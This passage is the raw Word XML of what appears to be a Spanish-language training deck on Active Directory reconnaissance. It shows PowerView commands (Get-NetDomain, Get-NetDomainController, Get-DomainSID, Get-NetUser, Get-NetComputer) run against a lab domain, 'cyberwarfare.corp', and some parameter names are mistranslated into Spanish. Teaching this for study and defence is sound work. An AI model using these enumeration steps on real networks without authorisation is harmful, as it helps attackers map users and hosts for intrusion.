              <v:shape w14:anchorId="49BA5035" id="Textbox 487" o:spid="_x0000_s1249" type="#_x0000_t202" style="position:absolute;margin-left:261.35pt;margin-top:25.45pt;width:495.85pt;height:79.6pt;z-index:-1563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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="64F50E8E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="225"/>
                        <w:ind w:left="271" w:right="718"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                        </w:rPr>
                        <w:t>Get-</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                        </w:rPr>
                        <w:t>NetDomain</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="283C388D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="125"/>
                        <w:ind w:left="271"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-4"/>
                        </w:rPr>
                        <w:t>Get-NetDomain –Dominio cyberwarfare.corp</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="37382382" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="554"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FB6F403" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1957"/>
        </w:tabs>
        <w:ind w:left="1957" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Recuperar el SID y el controlador de dominio actuales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BC035D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FD9CC65" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71830EB6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BD85C05" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="59"/>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85120" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2835B819" wp14:editId="2FE46DA0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2816351</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>212917</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7504430" cy="919480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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4430" cy="919480"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="537ABED1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="206"/>
                              <w:ind w:left="96"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                              </w:rPr>
                              <w:t>Get-</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                              </w:rPr>
                              <w:t>NetDomainController</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> –Dominio </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                              </w:rPr>
                              <w:t>cyberwarfare.corp</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="26F72BC6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="89"/>
                              <w:ind w:right="764"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                              </w:rPr>
                              <w:t>Get-DomainSID</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="2835B819" id="Textbox 488" o:spid="_x0000_s1250" type="#_x0000_t202" style="position:absolute;margin-left:221.75pt;margin-top:16.75pt;width:590.9pt;height:72.4pt;z-index:-15631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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="537ABED1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="206"/>
                        <w:ind w:left="96"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                        </w:rPr>
                        <w:t>Get-</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                        </w:rPr>
                        <w:t>NetDomainController</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> –Dominio </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                        </w:rPr>
                        <w:t>cyberwarfare.corp</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="26F72BC6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="89"/>
                        <w:ind w:right="764"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                        </w:rPr>
                        <w:t>Get-DomainSID</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="464F080E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1200" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60F4CB90" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1154"/>
        </w:tabs>
        <w:spacing w:before="65"/>
        <w:ind w:left="1154" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Recuperar una lista de usuarios en el dominio actual :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A324248" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65259E5E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F3970A9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="170"/>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85632" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="694E6518" wp14:editId="7F893EFA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3355847</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>283452</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5215255" cy="1126490"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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255" cy="1126490"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="6CE33C82" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="101"/>
                              <w:ind w:right="263"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                              </w:rPr>
                              <w:t>Get-</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                              </w:rPr>
                              <w:t>NetUser</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="64954448" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="312"/>
                              <w:ind w:left="713" w:right="263"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-2"/>
                              </w:rPr>
                              <w:t>Get-NetUser –Nombre de usuario emp1</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="694E6518" id="Textbox 489" o:spid="_x0000_s1251" type="#_x0000_t202" style="position:absolute;margin-left:264.25pt;margin-top:22.3pt;width:410.65pt;height:88.7pt;z-index:-15630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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="6CE33C82" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="101"/>
                        <w:ind w:right="263"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                        </w:rPr>
                        <w:t>Get-</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                        </w:rPr>
                        <w:t>NetUser</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="64954448" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="312"/>
                        <w:ind w:left="713" w:right="263"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-2"/>
                        </w:rPr>
                        <w:t>Get-NetUser –Nombre de usuario emp1</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A3EE8C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="431"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71031ABE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1154"/>
        </w:tabs>
        <w:ind w:left="1154" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Recupere una lista de equipos en el dominio actual :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F25D978" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A14A08C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="243"/>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86144" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4F42074A" wp14:editId="331E6F23">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1144524</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>329654</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="9549765" cy="1896110"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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9765" cy="1896110"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="5E4D58B4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="262"/>
                              <w:ind w:left="63"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                              </w:rPr>
                              <w:t>Get-</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                              </w:rPr>
                              <w:t>NetComputer</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="5850D21F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="312"/>
                              <w:ind w:left="784"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                              </w:rPr>
                              <w:t>Get-</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                              </w:rPr>
                              <w:t>NetComputer</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> – </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                              </w:rPr>
                              <w:t>FullData</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="2F99DC35" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="313"/>
                              <w:ind w:left="62"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:b/>
                                <w:sz w:val="48"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-12"/>
                                <w:sz w:val="48"/>
                              </w:rPr>
                              <w:t>Get-</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-12"/>
                                <w:sz w:val="48"/>
                              </w:rPr>
                              <w:t>NetComputer</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-12"/>
                                <w:sz w:val="48"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:b/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-12"/>
                                <w:sz w:val="48"/>
                              </w:rPr>
                              <w:t>–</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-12"/>
                                <w:sz w:val="48"/>
                              </w:rPr>
                              <w:t>OperatingSystem</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-12"/>
                                <w:sz w:val="48"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:b/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-12"/>
                                <w:sz w:val="48"/>
                              </w:rPr>
                              <w:t>"</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:b/>
                                <w:color w:val="EC7C30"/>
                                <w:spacing w:val="-12"/>
                                <w:sz w:val="48"/>
                              </w:rPr>
                              <w:t>Windows Server 2016 Standard</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:b/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-12"/>
                                <w:sz w:val="48"/>
                              </w:rPr>
                              <w:t>"</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="4F42074A" id="Textbox 490" o:spid="_x0000_s1252" type="#_x0000_t202" style="position:absolute;margin-left:90.1pt;margin-top:25.95pt;width:751.95pt;height:149.3pt;z-index:-1563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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5E4D58B4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="262"/>
                        <w:ind w:left="63"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                        </w:rPr>
                        <w:t>Get-</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                        </w:rPr>
                        <w:t>NetComputer</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="5850D21F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="312"/>
                        <w:ind w:left="784"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                        </w:rPr>
                        <w:t>Get-</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                        </w:rPr>
                        <w:t>NetComputer</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> – </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                        </w:rPr>
                        <w:t>FullData</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
